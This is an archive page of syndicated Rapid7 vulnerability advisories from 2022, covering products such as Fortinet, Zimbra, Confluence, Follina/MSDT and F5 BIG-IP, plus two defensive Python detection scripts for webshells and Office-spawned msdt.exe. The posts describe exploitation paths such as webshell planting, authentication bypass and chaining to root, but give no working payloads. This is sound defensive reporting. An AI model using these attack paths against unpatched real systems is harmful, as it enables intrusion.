Tag Archives: Emergent Threat Response

CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

On October 3, 2022, Fortinet released a software update that indicates then-current versions of their FortiOS (firewall) and FortiProxy (web proxy) software are vulnerable to CVE-2022-40684, a critical vulnerability that allows remote, unauthenticated attackers to bypass authentication and gain access to the administrative interface of these products with only a specially crafted http/s request.

According to communications from Fortinet that were shared on social media, Fortinet “is strongly recommending all customers with vulnerable versions to perform an immediate upgrade.”

Affected products

  • FortiOS 7.0.0 to 7.0.6
  • FortiOS 7.2.0 to 7.2.1
  • FortiProxy 7.0.0 to 7.0.6 and 7.2.0

Remediation

On Thursday, October 6, 2022, Fortinet released version 7.0.7 and version 7.2.2, which resolve the vulnerability.

Along with Fortinet, Rapid7 strongly recommends that organizations running an affected version of the software upgrade to 7.0.7 or 7.2.2 immediately, on an emergency basis. These products are edge devices, which are high-value and high-focus targets for attackers looking to gain internal network access. While Rapid7 is not currently aware of exploitation in the wild for this vulnerability, using prior FortiOS vulnerabilities as an indicator (such as CVE-2018-13379), we expect attackers to focus on CVE-2022-40684 quickly and for quite some time.

Furthermore, Rapid7 recommends that all high-value edge devices limit public access to any administrative interface.

Rapid7 customers

InsightVM/Nexpose customers: Our researchers are currently working on adding vulnerability check(s).

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/

CVE-2022-41352 is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite discovered in the wild due to active exploitation. The vulnerability arises from the utility (cpio) that Zimbra’s antivirus engine (Amavis) uses to extract inbound email attachments for scanning. Zimbra has provided a workaround, which is to install the pax utility and restart the Zimbra services. Note that pax is installed by default on Ubuntu, so Ubuntu-based Zimbra installations are not vulnerable by default.

Note: This vulnerability, CVE-2022-41352 is effectively identical to CVE-2022-30333 but leverages a different file format (.cpio and .tar as opposed to .rar). It is also a byproduct of a much older (unfixed) vulnerability, CVE-2015-1197. While the original CVE-2015-1197 affects most major Linux distros, our research team found that it is not exploitable unless a secondary application – such as Zimbra, in this case – uses cpio to extract untrusted archives; therefore, this blog is only focusing on Zimbra CVE-2022-41352.

Rapid7 has published technical documentation, including proof-of-concept (PoC) and indicator-of-compromise (IoC) information, regarding CVE-2022-41352 on AttackerKB.

Background

To exploit this vulnerability, an attacker would email a .cpio, .tar, or .rpm to an affected server. When Amavis inspects it for malware, it uses cpio to extract the file. Since cpio has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access. The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.

As of October 6, 2022, CVE-2022-41352 is not patched, but Zimbra has acknowledged the risk of relying on cpio in a blog post where they recommend mitigations. CVE-2022-41352 was discovered in the wild due to active exploitation. Recently, CISA and others have warned of multiple threat actors leveraging other vulnerabilities in Zimbra, which makes it likely that threat actors would logically move to exploit this latest unpatched vulnerability, too. In August, Rapid7 reported on the active exploitation of multiple vulnerabilities in Zimbra Collaboration Suite.

Affected products

Please note that information on affected versions or requirements for exploitability may change as we learn more about the threat.

To be exploitable, two conditions must exist:

  1. A vulnerable version of cpio must be installed, which is the case on basically every system (see CVE-2015-1197)
  2. The pax utility must not be installed, as Amavis prefers pax and pax is not vulnerable

Unfortunately, pax is not installed by default on Red Hat-based distros, and therefore they are vulnerable by default. We tested all (current) Linux distros that Zimbra officially supports in their default configurations and determined the following:

Linux distro                 Vulnerable?
Oracle Linux 8               Vulnerable
Red Hat Enterprise Linux 8   Vulnerable
Rocky Linux 8                Vulnerable
CentOS 8                     Vulnerable
Ubuntu 20.04                 Not vulnerable (pax is installed by default)
Ubuntu 18.04                 Not vulnerable (pax is installed, cpio has Ubuntu’s custom patch)

Zimbra says that their plan is to remove the dependency on cpio entirely by making pax a prerequisite for Zimbra Collaboration Suite. Moving to pax is the best option since cpio cannot be used securely (because most major operating systems removed a security patch).

Mitigation

Organizations that use an impacted version of Zimbra Collaboration Suite should apply Zimbra’s recommended workaround, which is to install the pax archive utility and then restart Zimbra (or reboot), while monitoring for further software updates from Zimbra.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2022-41352 via an authenticated vulnerability check (supported by Agent- and Scanner-based assessments) expected to be available in the October 6 content release. This check will identify systems with an affected version of Zimbra Collaboration Suite installed where the pax package is not available.

Suspected Post-Authentication Zero-Day Vulnerabilities in Microsoft Exchange Server

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/

On Thursday, September 29, a Vietnamese security firm called GTSC published information and IOCs on what they claim is a pair of unpatched Microsoft Exchange Server vulnerabilities being used in attacks on their customers’ environments dating back to early August 2022. The impact of exploitation is said to be remote code execution. From the information released, both vulnerabilities appear to be post-authentication flaws. According to GTSC, the vulnerabilities are being exploited to drop webshells on victim systems and establish footholds for post-exploitation behavior.

There has been no formal communication from Microsoft confirming or denying the existence of the flaws as of 4:30 PM EDT on Thursday, September 29. Our own teams have not validated the vulnerabilities directly.

Notably, it appears that both vulnerabilities have been reported to (and accepted by) Trend Micro’s Zero Day Initiative (ZDI) for disclosure coordination and are listed on ZDI’s site as “Upcoming Advisories.” This lends credibility to the claim, as does the specificity of the indicators shared in the firm’s blog. You can view the two reported vulnerabilities on this page by searching ZDI’s advisories for ZDI-CAN-18802 and ZDI-CAN-18333.

We are monitoring for additional detail and official communications and will update this blog with further information as it becomes available.

CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/

On August 24, 2022, Atlassian published an advisory for Bitbucket Server and Data Center alerting users to CVE-2022-36804. The advisory reveals a command injection vulnerability in multiple API endpoints, which allows an attacker with access to a public repository or with read permissions to a private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. CVE-2022-36804 carries a CVSSv3 score of 9.8 and is easily exploitable. Rapid7’s vulnerability research team has a full technical analysis in AttackerKB, including how to use CVE-2022-36804 to create a simple reverse shell.

According to Shodan, there are about 1,400 internet-facing servers, but it’s not immediately obvious how many have a public repository. There are no public reports of exploitation in the wild as of September 20, 2022, but there has been strong interest in the vulnerability from researchers and exploit brokers, and there are now multiple public exploits available. Because the vulnerability is trivially exploitable and the patch is relatively simple to reverse-engineer, it’s likely that targeted exploitation has already occurred in the wild. We expect to see larger-scale exploitation of CVE-2022-36804 soon.

Affected products

  • Bitbucket Server and Data Center 7.6 prior to 7.6.17
  • Bitbucket Server and Data Center 7.17 prior to 7.17.10
  • Bitbucket Server and Data Center 7.21 prior to 7.21.4
  • Bitbucket Server and Data Center 8.0 prior to 8.0.3
  • Bitbucket Server and Data Center 8.1 prior to 8.1.3
  • Bitbucket Server and Data Center 8.2 prior to 8.2.2
  • Bitbucket Server and Data Center 8.3 prior to 8.3.1

Mitigation guidance

Organizations that use Bitbucket Server and Data Center in their environments should patch as quickly as possible using Atlassian’s guide, without waiting for a regular patch cycle to occur. Blocking network access to Bitbucket may also function as a temporary stop-gap solution, but this should not be a substitute for patching.

Rapid7 customers

Our engineering team is in the process of developing a vulnerability check for CVE-2022-36804. We will update this blog with further information as it becomes available.

Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/

Over the past few weeks, five different vulnerabilities affecting Zimbra Collaboration Suite have come to our attention, one of which is unpatched, and four of which are being actively and widely exploited in the wild by well-organized threat actors. We urge organizations who use Zimbra to patch to the latest version on an urgent basis, and to upgrade future versions as quickly as possible once they are released.

Exploited RCE vulnerabilities

The following vulnerabilities can be used for remote code execution and are being exploited in the wild.

CVE-2022-30333

CVE-2022-30333 is a path traversal vulnerability in unRAR, Rarlab’s command line utility for extracting RAR file archives. CVE-2022-30333 allows an attacker to write a file anywhere on the target file system as the user that executes unrar. Zimbra Collaboration Suite uses a vulnerable implementation of unrar (specifically, the amavisd component, which is used to inspect incoming emails for spam and malware). Zimbra addressed this issue in 9.0.0 patch 25 and 8.5.15 patch 32 by replacing unrar with 7z.

Our research team has a full analysis of CVE-2022-30333 in AttackerKB. A Metasploit module is also available. Note that the server does not necessarily need to be internet-facing to be exploited — it simply needs to receive a malicious email.

CVE-2022-27924

CVE-2022-27924 is a blind Memcached injection vulnerability first analyzed publicly in June 2022. Successful exploitation allows an attacker to change arbitrary keys in the Memcached cache to arbitrary values. In the worst-case scenario, an attacker can steal a user’s credentials when a user attempts to authenticate. Combined with CVE-2022-27925, an authenticated remote code execution vulnerability, and CVE-2022-37393, a currently unpatched privilege escalation issue that was publicly disclosed in October 2021, capturing a user’s password can lead to remote code execution as the root user on an organization’s email server, which frequently contains sensitive data.

Our research team has a full analysis of CVE-2022-27924 in AttackerKB. Note that an attacker does need to know a username on the server in order to exploit CVE-2022-27924. According to Sonar, it is also possible to poison the cache for any user by stacking multiple requests.

CVE-2022-27925

CVE-2022-27925 is a directory traversal vulnerability in Zimbra Collaboration Suite versions 8.8.15 and 9.0 that allows an authenticated user with administrator rights to upload arbitrary files to the system. On August 10, 2022, security firm Volexity published findings from multiple customer compromise investigations that indicated CVE-2022-27925 was being exploited in combination with a zero-day authentication bypass, now assigned CVE-2022-37042, that allowed attackers to leverage CVE-2022-27925 without authentication.

CVE-2022-37042

As noted above, CVE-2022-37042 is a critical authentication bypass that arises from an incomplete fix for CVE-2022-27925. Zimbra patched CVE-2022-37042 in 9.0.0P26 and 8.8.15P33.

Unpatched privilege escalation CVE-2022-37393

In October of 2021, researcher Darren Martyn published an exploit for a zero-day root privilege escalation vulnerability in Zimbra Collaboration Suite. When successfully exploited, the vulnerability allows a user with a shell account as the zimbra user to escalate to root privileges. While this issue requires a local account on the Zimbra host, the previously mentioned vulnerabilities in this blog post offer plenty of opportunity to obtain it.

Our research team tested the privilege escalation in combination with CVE-2022-30333 and CVE-2022-27924 at the end of July 2022 and found that at the time, all versions of Zimbra were affected through at least 9.0.0 P25 and 8.8.15 P32. Rapid7 disclosed the vulnerability to Zimbra on July 21, 2022 and later assigned CVE-2022-37393 (still awaiting NVD analysis) to track it. A full analysis of CVE-2022-37393 is available in AttackerKB. A Metasploit module is also available.

Mitigation guidance

We strongly advise that all organizations who use Zimbra in their environments update to the latest available version (at time of writing, the latest versions available are 9.0.0 P26 and 8.8.15 P33) to remediate known remote code execution vectors. We also advise monitoring Zimbra’s release communications for future security updates, and patching on an urgent basis when new versions become available.

The AttackerKB analyses for CVE-2022-30333, CVE-2022-27924, and CVE-2022-37393 all include vulnerability details (including proofs of concept) and sample IOCs. Volexity’s blog also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published lists of valid JSP files included in Zimbra installations for the latest version of 8.8.15 and of 9.0.0 (at time of writing).
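The webshell-hunting approach mentioned above (comparing the JSP files on a Zimbra instance with the set that ships with that build) is simple to automate. The script below is an added example written for this page, not Rapid7’s or Volexity’s code: it walks a directory tree, collects every .jsp path, and reports files that are not in a known-good baseline (candidate webshells) as well as baseline files that are missing. The baseline set and the planted cmd.jsp in demo() are constructed placeholders; in practice the baseline is the published JSP list for the exact Zimbra version being checked, and the root is the Zimbra install directory.

```python
import os
import tempfile
from typing import Iterable, Set

# Constructed baseline for illustration only. A real baseline is the published list
# of JSP files shipped with the exact Zimbra build you are checking.
KNOWN_GOOD_JSP = {
    "jetty_base/webapps/zimbra/public/login.jsp",
    "jetty_base/webapps/zimbra/h/search.jsp",
    "jetty_base/webapps/zimbraAdmin/public/login.jsp",
}


def list_jsp_files(root: str) -> Set[str]:
    """Walk `root` and return every *.jsp path relative to it, '/'-separated."""
    found: Set[str] = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jsp"):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                found.add(rel.replace(os.sep, "/"))
    return found


def compare_jsp(found: Iterable[str], baseline: Set[str]) -> dict:
    """Split the on-disk JSP set into unexpected files (triage as possible webshells)
    and baseline files that are missing (possible tampering or a baseline mismatch)."""
    found_set = set(found)
    return {
        "unexpected": sorted(found_set - baseline),
        "missing": sorted(baseline - found_set),
    }


def demo() -> dict:
    """Build a constructed install tree in a temp dir with one extra JSP planted
    (a stand-in for a dropped webshell), then compare it against the baseline."""
    planted = "jetty_base/webapps/zimbra/public/cmd.jsp"  # constructed, not a real IoC
    with tempfile.TemporaryDirectory() as root:
        for rel in KNOWN_GOOD_JSP | {planted}:
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write("<%-- constructed placeholder --%>\n")
        return compare_jsp(list_jsp_files(root), KNOWN_GOOD_JSP)


if __name__ == "__main__":
    import sys

    if len(sys.argv) == 3:
        # Usage: python check_jsp.py /path/to/zimbra baseline.txt (one relative path per line)
        with open(sys.argv[2]) as fh:
            baseline = {line.strip() for line in fh if line.strip()}
        report = compare_jsp(list_jsp_files(sys.argv[1]), baseline)
    else:
        report = demo()
    for path in report["unexpected"]:
        print("UNEXPECTED JSP:", path)
    for path in report["missing"]:
        print("MISSING FROM DISK:", path)
```

An unexpected JSP is a lead, not a verdict: confirm it against the baseline for the exact patch level in use, then review its contents and modification time before treating it as a webshell.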

Finally, we recommend blocking internet traffic to Zimbra servers wherever possible and configuring Zimbra to block external Memcached, even on patched versions of Zimbra.

Rapid7 customers

Our engineering team is in the investigation phase of vulnerability check development and will assess the risk and customer needs for each vulnerability separately. We will update this blog with more information as it becomes available.

Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/

Exploitation is underway for one of the trio of critical Atlassian vulnerabilities that were published last week affecting several of the company’s on-premises products. Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of CVE-2022-26134 in Confluence Server and Confluence Data Center.

CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:

  • Confluence Server
  • Confluence Data Center

CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:

  • Bamboo Server and Data Center
  • Bitbucket Server and Data Center
  • Confluence Server and Data Center
  • Crowd Server and Data Center
  • Crucible
  • Fisheye
  • Jira Server and Data Center
  • Jira Service Management Server and Data Center

CVE-2022-26138: Hardcoded password in Questions for Confluence app

The most critical of these three is CVE-2022-26138, as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization’s Confluence instance. Unsurprisingly, it didn’t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.

Affected versions

  • Questions for Confluence 2.7.x

    • 2.7.34
    • 2.7.35
  • Questions for Confluence 3.0.x

    • 3.0.2

Mitigation guidance

Organizations using on-prem Confluence should follow Atlassian’s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian’s advisory also includes information on how to look for evidence of exploitation. An FAQ has also been provided.

Please note: Atlassian’s Questions For Confluence Security Advisory 2022-07-20 has a very important call-out that “uninstalling the Questions for Confluence app does not remediate this vulnerability.”

CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities

Two other vulnerabilities were announced at the same time, CVE-2022-26136 and CVE-2022-26137, which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. Cloud versions of Atlassian have already been fixed by the company.

The list of affected versions is long and can be found on Atlassian’s Security Advisory.

While the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.

Rapid7 customers

InsightVM and Nexpose: Our engineering team is investigating the feasibility of a vulnerability check to help InsightVM and Nexpose customers assess exposure to CVE-2022-26138.

Exploitation of Mitel MiVoice Connect SA CVE-2022-29499

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/

In April 2022, telecommunications company Mitel published a security advisory on CVE-2022-29499, a data validation vulnerability in the Service Appliance component of MiVoice Connect, a business communications product. The vulnerability, which was unpatched at time of publication, arose from insufficient data validation for a diagnostic script and potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. CVE-2022-29499 has a CVSSv3 score of 9.8.

On June 23, 2022, security firm Crowdstrike published an analysis on a ransomware intrusion attempt that had targeted CVE-2022-29499 — which at the time of detection was an undisclosed zero-day vulnerability — as an initial access vector. Over the past two weeks, Rapid7 Managed Detection and Response (MDR) has also observed a small number of intrusions that have leveraged CVE-2022-29499 as an initial access vector.

There is currently no indication that a large number of these appliances are exposed to the public internet, and we have no evidence that this vulnerability is being targeted in wider-scale ransomware campaigns. We are conscious of the fact, however, that the proliferation of ransomware in general has continued to shape risk models for many organizations, and that network perimeter devices are tempting targets for a variety of attackers.

Affected products

CVE-2022-29499 affects MiVoice Connect deployments (including earlier versions 14.2) that include the MiVoice Connect Service Appliances, SA 100, SA 400 and/or Virtual SA. Vulnerable firmware versions include R19.2 SP3 (22.20.2300.0) and earlier, and R14.x and earlier. See Mitel product security advisory 22-0002 and their security bulletin for additional information.

Mitigation guidance

Mitel MiVoice Connect customers who use vulnerable versions of the Service Appliance in their deployments should update to a fixed version of the appliance immediately. Mitel released patches for CVE-2022-29499 in early June 2022; organizations that have not updated the firmware on their appliances since before that timeframe should apply fixes as soon as possible.

Rapid7 customers

We have not been able to determine whether a vulnerability check is feasible at this time. We are investigating alternative options to help InsightVM and Nexpose customers assess exposure, including the potential to generically fingerprint MiVoice Connect in customer environments.

CVE-2022-27511: Citrix ADM Remote Device Takeover

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/

On Monday, June 14, 2022, Citrix published an advisory on CVE-2022-27511, a critical improper access control vulnerability affecting their Application Delivery Management (ADM) product.

A remote, unauthenticated attacker can leverage CVE-2022-27511 to reset administrator credentials to the default value at the next reboot. This allows the attacker to use SSH and the default administrator credentials to access the affected management console. The vulnerability has been patched in Citrix ADM 13.1-21.53 and ADM 13.0-85.19, and the patches should be applied as soon as possible. Versions of Citrix ADM before 13.0 and 13.1 are end of life, so Citrix will not make patches available for these versions. Users still on version 12.x are encouraged to upgrade to a supported version.

At the time of this writing, no exploitation has been observed, and no exploits have been made publicly available. However, given the nature of the vulnerability and the footprint of Citrix ADM, we anticipate that exploitation will happen as soon as an exploit is made available.

Mitigation guidance

Citrix ADM customers should upgrade their versions of both ADM server and agents as soon as possible. Citrix notes in their advisory that they strongly recommend that network traffic to the Citrix ADM’s IP address be segmented, either physically or logically, from standard network traffic.

Rapid7 customers

We are investigating the feasibility of a vulnerability check for InsightVM and Nexpose customers.

Active Exploitation of Confluence CVE-2022-26134

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/

On June 2, 2022, Atlassian published a security advisory for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability is unpatched as of June 2 and is being exploited in the wild.

Affected versions include Confluence Server version 7.18.0. According to Atlassian’s advisory, subsequent testing indicates that versions of Confluence Server and Data Center >= 7.4.0 are potentially vulnerable. There may also be other vulnerable versions not yet tested.

Security firm Volexity has in-depth analysis of attacks they have observed targeting CVE-2022-26134, including indicators of compromise and hunting rules.

Mitigation guidance

In the absence of a patch, organizations should restrict or disable Confluence Server and Confluence Data Center instances on an emergency basis. They should also consider implementing IP address safelisting rules to restrict access to Confluence.

For those unable to apply safelist IP rules to their Confluence server installations, consider adding WAF protection. Based on the details published so far, which admittedly are sparse, we recommend adding Java Deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. You can find an example here.

Rapid7 customers

We are investigating options for a vulnerability check to allow InsightVM and Nexpose customers to assess their exposure to CVE-2022-26134. We will update this blog as new information becomes available.

CVE-2022-30190: “Follina” Microsoft Support Diagnostic Tool Vulnerability

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/

On May 30, 2022, Microsoft Security Response Center (MSRC) published a blog on CVE-2022-30190, an unpatched vulnerability in the Microsoft Support Diagnostic Tool (msdt) in Windows. Microsoft’s advisory on CVE-2022-30190 indicates that exploitation has been detected in the wild.

According to Microsoft, CVE-2022-30190 is a remote code execution vulnerability that exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights. Workarounds are available in Microsoft’s blog.

Rapid7 research teams are investigating this vulnerability and will post updates to this blog as they are available. Notably, the flaw requires user interaction to exploit, looks similar to many other vulnerabilities that necessitate a user opening an attachment, and appears to leverage a vector described in 2020. Despite the description, it is not a typical remote code execution vulnerability.

Rapid7 customers

Our teams have begun working on a vulnerability check for InsightVM and Nexpose customers.

InsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability:

  • Suspicious Process – Microsoft Office App Spawns MSDT.exe

We recommend that you review your settings for this detection rule and confirm it is turned on and set to an appropriate rule action and priority for your organization.
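For teams without InsightIDR, the logic behind a rule like “Microsoft Office App Spawns MSDT.exe” can be reproduced over process-creation telemetry. The snippet below is an added example written for this page, not Rapid7’s detection rule or its implementation: it inspects Sysmon-style process-creation events, flags any case where an Office application is the parent of msdt.exe, and records whether the command line carries the ms-msdt: URL protocol that Microsoft describes as the vector. The OFFICE_APPS set, the field names, and the three sample events are all constructed assumptions; map the field names to whatever your EDR or log pipeline emits.

```python
import json
import ntpath
from typing import Iterable, List

# Assumed set of Office parent processes to watch; extend to what is deployed in your estate.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

RULE_NAME = "Suspicious Process - Microsoft Office App Spawns MSDT.exe"

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    # 1. Word spawning msdt.exe via the ms-msdt: URL protocol: this is what the rule targets.
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id EXAMPLE-PACK',
     "User": r"CORP\alice"},
    # 2. Benign: a user opening a troubleshooter from Explorer.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": r'"C:\Windows\System32\msdt.exe" /id EXAMPLE-TROUBLESHOOTER',
     "User": r"CORP\bob"},
    # 3. Benign: Word printing (spawns the print spooler helper, not msdt).
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288",
     "User": r"CORP\alice"},
]


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path or "").lower()


def detect_office_spawns_msdt(events: Iterable[dict]) -> List[dict]:
    """Return one alert per event where an Office app is the parent of msdt.exe."""
    alerts = []
    for ev in events:
        parent = _basename(ev.get("ParentImage"))
        child = _basename(ev.get("Image"))
        if parent in OFFICE_APPS and child == "msdt.exe":
            cmdline = (ev.get("CommandLine") or "").lower()
            alerts.append({
                "rule": RULE_NAME,
                "parent": parent,
                "child": child,
                "user": ev.get("User"),
                # Presence of the URL-protocol form raises triage priority.
                "ms_msdt_url_protocol": "ms-msdt:" in cmdline,
                "command_line": ev.get("CommandLine"),
            })
    return alerts


def detect_from_jsonl(lines: Iterable[str]) -> List[dict]:
    """Same rule over newline-delimited JSON, the usual export format for such events."""
    return detect_office_spawns_msdt(json.loads(line) for line in lines if line.strip())


if __name__ == "__main__":
    jsonl = [json.dumps(ev) for ev in SAMPLE_EVENTS]
    for alert in detect_from_jsonl(jsonl):
        print(alert["rule"], "|", alert["user"], "|", alert["parent"], "->", alert["child"],
              "| ms-msdt URL protocol:", alert["ms_msdt_url_protocol"])
```

Only the first sample event fires: Explorer launching msdt.exe is ordinary user behaviour, and Word spawning a print helper is not msdt at all. Tune the parent set and the rule action to your environment, as the post advises for the InsightIDR rule.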

CVE-2022-22972: Critical Authentication Bypass in VMware Workspace ONE Access, Identity Manager, and vRealize Automation

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/05/19/cve-2022-22972-critical-authentication-bypass-in-vmware-workspace-one-access-identity-manager-and-vrealize-automation/

On May 18, 2022, VMware published VMSA-2022-0014 on CVE-2022-22972 and CVE-2022-22973. The more severe of the two vulnerabilities is CVE-2022-22972, a critical authentication bypass affecting VMware’s Workspace ONE Access, Identity Manager, and vRealize Automation solutions. The vulnerability allows attackers with network access to the UI to obtain administrative access without the need to authenticate. CVE-2022-22972 may be chained with CVE-2022-22973 to bypass authentication and obtain root access. A full list of affected products is available in VMware’s advisory.

At time of writing, there is no public proof of concept for CVE-2022-22972, and there have been no reports of exploitation in the wild. We expect this to change quickly, however, since Rapid7 researchers have seen similar VMware vulnerabilities come under attack quickly in recent weeks. In April 2022, we published details on CVE-2022-22954, a server-side template injection flaw that was widely exploited by threat actors targeting internet-facing VMware Workspace ONE and Identity Manager applications.

In conjunction with VMware’s advisory on May 18, the US Cybersecurity and Infrastructure Security Agency (CISA) published Emergency Directive 22-03 in response to VMSA-2022-0014. The directive requires all “Federal Civilian Executive Branch” agencies to either apply the patch or remove affected VMware installations from agency networks by May 24, 2022. CISA also released an additional alert emphasizing that threat actors are known to be chaining recent VMware vulnerabilities — CVE-2022-22954 and CVE-2022-22960 — to gain full control of vulnerable systems. CISA’s alert notes that the new vulnerabilities in VMSA-2022-0014 are likely to be exploited in the wild quickly:

Due to the [likely] rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet — that did not immediately apply updates — to assume compromise.

Mitigation guidance

VMware customers should patch their Workspace ONE Access, Identity Manager, and vRealize Automation installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions here on patching and applying workarounds.

Additionally, if your installation is internet-facing, consider taking steps to remove direct access from the internet. It may also be prudent to follow CISA’s guidance on post-exploitation detection methods found in Alert (AA22-138B).

Rapid7 customers

InsightVM and Nexpose customers can assess their VMware Workspace ONE Access and Identity Manager systems’ exposure to CVE-2022-22972 and CVE-2022-22973 with authenticated vulnerability checks for Unix-like systems available in the May 19, 2022 content release. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.) Additional vulnerability coverage will be evaluated as the need arises.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/

Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388

On May 4, 2022, F5 released an advisory listing several vulnerabilities, including CVE-2022-1388, a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.

The vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:

  • F5 BIG-IP 16.1.0 – 16.1.2 (patched in 16.1.2.2)
  • F5 BIG-IP 15.1.0 – 15.1.5 (patched in 15.1.5.1)
  • F5 BIG-IP 14.1.0 – 14.1.4 (patched in 14.1.4.6)
  • F5 BIG-IP 13.1.0 – 13.1.4 (patched in 13.1.5)
  • F5 BIG-IP 12.1.0 – 12.1.6 (no patch available, will not fix)
  • F5 BIG-IP 11.6.1 – 11.6.5 (no patch available, will not fix)

On Monday, May 9, 2022, Horizon3 released a full proof of concept, which we successfully executed to get a root shell. Other groups have developed exploits as well.

Over the past few days, BinaryEdge has detected an increase in scanning and exploitation for F5 BIG-IP. Others on Twitter have also observed exploitation attempts. Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.

Widespread exploitation is somewhat mitigated, however, by the small number of internet-facing F5 BIG-IP devices; our best guess is that there are only about 2,500 targets on the internet.

Mitigation guidance

F5 customers should patch their BIG-IP devices as quickly as possible using F5’s upgrade instructions. Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level — only authorized users should be able to reach the management interface at all.

F5 also provides a workaround as part of their advisory. If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.

Exploit attempts appear in at least two different log files:

  • /var/log/audit
  • /var/log/restjavad-audit.0.log

Because this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.

Rapid7 customers

